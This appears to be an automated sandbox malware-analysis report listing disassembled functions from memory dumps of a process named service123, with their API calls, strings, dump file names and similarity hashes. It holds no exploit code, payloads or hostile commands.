Function 6C21F840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C21F85F
ReleaseSemaphore.KERNEL32 ref: 6C21F8E3

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: d43052a9930a44eb554caadfdb8cbe029f63e19a86c1b5febf4c1136681c559d
Instruction ID: ea37884bc11be7ccb0da102e636a43c80f662c3ab55c6bce2bb8d95abc1e4d72
Opcode Fuzzy Hash: d43052a9930a44eb554caadfdb8cbe029f63e19a86c1b5febf4c1136681c559d
Instruction Fuzzy Hash: 67317A70A09345CFDB60EF28C6487477BF4BB46328F05821CED6897A80C738D549CB92

Function 6C21FCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C21FCEC
ReleaseSemaphore.KERNEL32 ref: 6C21FD7C
CreateSemaphoreW.KERNEL32 ref: 6C21FDC7
WaitForSingleObject.KERNEL32 ref: 6C21FE10

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: 166e4843dcf0616463be9d0670022ea6e06d958a0201db194e51eaf1254d3e61
Instruction ID: 4aa9e4b46fd65fd97d393dca9c02b0ea1ded5e209e40699ca683522b31d3b5a8
Opcode Fuzzy Hash: 166e4843dcf0616463be9d0670022ea6e06d958a0201db194e51eaf1254d3e61
Instruction Fuzzy Hash: 88316970609345CFDB60EF28C2887577BF4BB46328F158258ED6C8BA81C739D54ACB92

Function 6C2D8520 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2D8535
strlen.MSVCRT ref: 6C2D8583
memcpy.MSVCRT ref: 6C2D85A0
setlocale.MSVCRT ref: 6C2D85B4
setlocale.MSVCRT ref: 6C2D85EA

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 047d3852ad12579e47a542660a9a06eb3e2d3561714fba0153d0a41ed32e8397
Instruction ID: e83a2f4595ed5ed62f922d4fb6d131d5ff1e11d9e13afa87c559fece97e2b5dc
Opcode Fuzzy Hash: 047d3852ad12579e47a542660a9a06eb3e2d3561714fba0153d0a41ed32e8397
Instruction Fuzzy Hash: 2F21D0B16093559FD340EF29D48065EFBE0BF88658F458A6EE9C887701E338D944CF82

Function 6C229530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C229549
_unlock.MSVCRT ref: 6C229571
calloc.MSVCRT ref: 6C2295BF

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: 3cab4505a7e592ceee37fa547b139099348668d78694d08c0a230282391b345c
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 1A114C716042158FD740AF2CC480796BBE4BF89344F158669EC98CF749EB78D864CBA2

Function 6C220290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2202BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2204DE), ref: 6C2202CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2204DE), ref: 6C220300

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: 2f71583fc8d85a44dd44db1126377eed73bd2e4d45dd677de268fd1bd66c2311
Instruction ID: a63b1b118e967adb0431829951d8c9793d033c0e78344d11f95f50369841a7a9
Opcode Fuzzy Hash: 2f71583fc8d85a44dd44db1126377eed73bd2e4d45dd677de268fd1bd66c2311
Instruction Fuzzy Hash: 32F03A7050978ACBD7107F68C55935A7AB4BB42328F904B1CE8A98BA90E73C8018CF52

Function 6C2AB990 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 432COMMON

Download Yara Rule

Strings

4-l, xrefs: 6C2E4FDC, 6C2E5363, 6C2E537B
T.l, xrefs: 6C2E51F8
H.l, xrefs: 6C2E5240

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: H.l$T.l$4-l
API String ID: 0-610724568
Opcode ID: d8818aa119f36c9bad6d36fc4e67f07fafbea64423bd7fb33d13d131d1fc79ee
Instruction ID: 2537d12d4b58a7ecd372ff1bb04a18a4e6156caa4f2666733a7045ab89bced11
Opcode Fuzzy Hash: d8818aa119f36c9bad6d36fc4e67f07fafbea64423bd7fb33d13d131d1fc79ee
Instruction Fuzzy Hash: FBE1D7B0209B1DCAD701BFB4C4804AEBAE1BF45648F515C2CD9C16BF41DB78854ADBCA

Function 006C4BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 006C4C27
@, xrefs: 006C4647

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 1db6ec385ed71391ee4f0cc7245e94c729dbab07c7e80cbb27f2526824f84c66
Instruction ID: f779ecc9d5b8165ef35d5d7cb3c73c8056c4e496e7ed4d2609369b2cc9c9a281
Opcode Fuzzy Hash: 1db6ec385ed71391ee4f0cc7245e94c729dbab07c7e80cbb27f2526824f84c66
Instruction Fuzzy Hash: E1A15C316083958BD721DF2480A0BBABBE2FF85714F148A1DE8D997342DB35D946DB82

Function 6C2252CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 6C2252F7
@, xrefs: 6C224D17

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 4d5725286d81f32a81125095e11afa10fdc58cc3d2c4f85ce1f5a73d45a500fe
Instruction ID: f95f3b3b4275239cffc6fb8781b2dbb152480bf7ee53299a267c284680c700fb
Opcode Fuzzy Hash: 4d5725286d81f32a81125095e11afa10fdc58cc3d2c4f85ce1f5a73d45a500fe
Instruction Fuzzy Hash: 0BA17F7160C35A8BD721CF29C09079AB7E1BF85319F148A2DECD88B745D779D50ACB82

Function 006C1B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 006C1C20
Unknown pseudo relocation bit size %d., xrefs: 006C1C6D
Unknown pseudo relocation protocol version %d., xrefs: 006C1DF3

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 9a26c1a9b8566706bd2c13ef3af6cc29777debb6ce5ec7448e6dd955084570c9
Instruction ID: 8f4920f3d983851c2a93badecf337ceb36f03ffd86e9cf1fb17d2a42eb28d653
Opcode Fuzzy Hash: 9a26c1a9b8566706bd2c13ef3af6cc29777debb6ce5ec7448e6dd955084570c9
Instruction Fuzzy Hash: B2815D71A046058BDB10DF68D880FB9BBE3FF87344F19856DE855AB356D330E8158B92

Function 6C21A850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 6C21A9BD
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C21A970
Unknown pseudo relocation protocol version %d., xrefs: 6C21AB43

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: e2555b5b06ee16275ba724641a7bd498569b9f6c70d15378f9abf4cbd6ae1ffd
Instruction ID: 49dfdf462b40d968019ead7310c62e82ad617be6f415f776a04d60500442e917
Opcode Fuzzy Hash: e2555b5b06ee16275ba724641a7bd498569b9f6c70d15378f9abf4cbd6ae1ffd
Instruction Fuzzy Hash: 2B715A72A0925ECFCB10CF69C580B8EB7F4BB45354F158529EE68ABF44D330E8598B91

Function 006C80D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 006C80F2
strchr.MSVCRT ref: 006C8102
atoi.MSVCRT ref: 006C8113

Strings

., xrefs: 006C80F7

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: 71b30e07be1d194d7dbf75b40b00e442557421429705585ff23ae18110e228aa
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: 36E0E6719047024ED7507F34C90672A75D2EB50300F4D8C6CD48487746DB79D4469756

Function 6C229128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C229142
strchr.MSVCRT ref: 6C229152
atoi.MSVCRT ref: 6C229163

Strings

., xrefs: 6C229147

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction ID: 7c439f6b1dd91a1df712acac41cc0176b9ea1ed0a9f0f2a5bfb0d71c6357023c
Opcode Fuzzy Hash: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction Fuzzy Hash: 00E0ECB19047158EE7107F38C40939AB6E1BB81308F85886CD88897744E77D94699B52

Function 6C229293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C22929F
GetProcAddress.KERNEL32 ref: 6C2292B3

Strings

advapi32.dll, xrefs: 6C229298
SystemFunction036, xrefs: 6C2292A8

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: 73bdaa07474691e78fbefc6e6c0b16fd4f5d7625305d92e291207ad417c22079
Instruction ID: 1f03412e2a7cd1d9393147dd4c67898ef1458a955c962eaf1c0b5b837df98c69
Opcode Fuzzy Hash: 73bdaa07474691e78fbefc6e6c0b16fd4f5d7625305d92e291207ad417c22079
Instruction Fuzzy Hash: 7DE086B1994348CFCB00BF78960604AFBF0B646320F004A2ED89997600D774C015CF97

Function 6C221409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C2214D2

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 47c6af9aa0acbdccfbf20eb8006393099804556b6c6af8619446578c2aeb795f
Instruction ID: b725090ded62e3629f08cc25c690b6c7fc2729618793650e5a2014d41bc06d77
Opcode Fuzzy Hash: 47c6af9aa0acbdccfbf20eb8006393099804556b6c6af8619446578c2aeb795f
Instruction Fuzzy Hash: 6922F175A097458FC720CF29C484B9AFBE1BF89318F158A2EE9D897710D779E844CB42

Function 6C2A9F20 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 366COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C2A9FEC
memset.MSVCRT ref: 6C2AA04E

Strings

8O/l0, xrefs: 6C2AA200, 6C2AA1F4
8O/l0, xrefs: 6C2A9FF1, 6C2AA00D

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memset
String ID: 8O/l0$8O/l0
API String ID: 2221118986-4134269850
Opcode ID: 8386fdaa4dde7dadfa71b07a0a47b532f999b86da72584309d2358cc0cd622b4
Instruction ID: 07312506a076e14ccba5b4cf6a3be0045d33ff87075b3ce7c4ba344ed87d8fc8
Opcode Fuzzy Hash: 8386fdaa4dde7dadfa71b07a0a47b532f999b86da72584309d2358cc0cd622b4
Instruction Fuzzy Hash: 67F1267060920ACFC710CF69C484A1AB7F1FF8A319B19865DED589B750DB32E946CF91

Function 6C21A340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C21A3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C22C41C), ref: 6C21A3E0
free.MSVCRT ref: 6C21A3EA

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: a796f099ca7b940c9dcf8623f1dfa8be1d1ec7bf9e34e84562df218a35b81f45
Instruction ID: 9b273a4a0fc0c9ba70c0118d81e8ec0de7d4034cf547d2d5830ac9a35f75ef10
Opcode Fuzzy Hash: a796f099ca7b940c9dcf8623f1dfa8be1d1ec7bf9e34e84562df218a35b81f45
Instruction Fuzzy Hash: 3E317E7560D71ACBD300AF2AD48475BBBE1AFC1769F210A2DEEA44BF40D3B1D4498792

Function 6C265C40 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C265D74
memchr.MSVCRT ref: 6C265D93

Part of subcall function 6C2D8520: setlocale.MSVCRT ref: 6C2D8535

Strings

-, xrefs: 6C265F72
., xrefs: 6C265D85

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: d30208c0ce883f0e67c80447ff4cbc86b6d19e0c1c0f0ac864655f32882f5ac4
Instruction ID: dbd65e3b9ab8356de7599cc48e08e5cea16ac8f7a6852f5660522366b6d520b4
Opcode Fuzzy Hash: d30208c0ce883f0e67c80447ff4cbc86b6d19e0c1c0f0ac864655f32882f5ac4
Instruction Fuzzy Hash: F6D124B590871D8FCB00DFA9C08468EBBF1BF48314F15862AE8A4EB755D734D989CB91

Function 6C266080 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C2661AE
memchr.MSVCRT ref: 6C2661CD

Part of subcall function 6C2D8520: setlocale.MSVCRT ref: 6C2D8535

Strings

., xrefs: 6C2661BF
6, xrefs: 6C2663B6

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: f2ff7fe2d5d9d0cf85ecf3e3d8e69996077e2275e137b4a1ae494c88ac9ec57b
Instruction ID: 239425a61323dd5baa8e2b46988296091d3668ffa3a7121a68d21a2799bc6ec1
Opcode Fuzzy Hash: f2ff7fe2d5d9d0cf85ecf3e3d8e69996077e2275e137b4a1ae494c88ac9ec57b
Instruction Fuzzy Hash: D4D115B19093599FCB00DFA9C4C068EBBF0BF88314F158A6AE8A4E7B51D734D945CB91

Function 6C2E0F90 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2E0FD5

Strings

basic_string::append, xrefs: 6C2E104D, 6C2E1059, 6C2E114C, 6C2E120C

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
